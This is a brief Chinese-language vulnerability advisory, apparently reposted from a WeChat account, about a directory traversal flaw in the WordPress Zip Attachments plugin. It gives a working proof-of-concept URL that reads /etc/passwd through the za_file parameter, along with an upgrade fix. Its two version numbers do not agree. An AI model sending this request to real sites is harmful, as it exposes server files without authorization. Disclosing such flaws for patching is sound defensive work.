#############################
免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。
##############################
WordPress 1.5.1 之前的 Zip 附件插件中的 download.php 中的目录遍历漏洞允许远程攻击者通过 za_file 参数中的 ..(点点)读取任意文件。
Zip 附件 <= 1.1.4 - 任意文件下载
/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
修复方案:
升级:Zip 附件插件 1.5.1
原文始发于微信公众号(菜鸟小新):wordpress 任意文件下载 漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论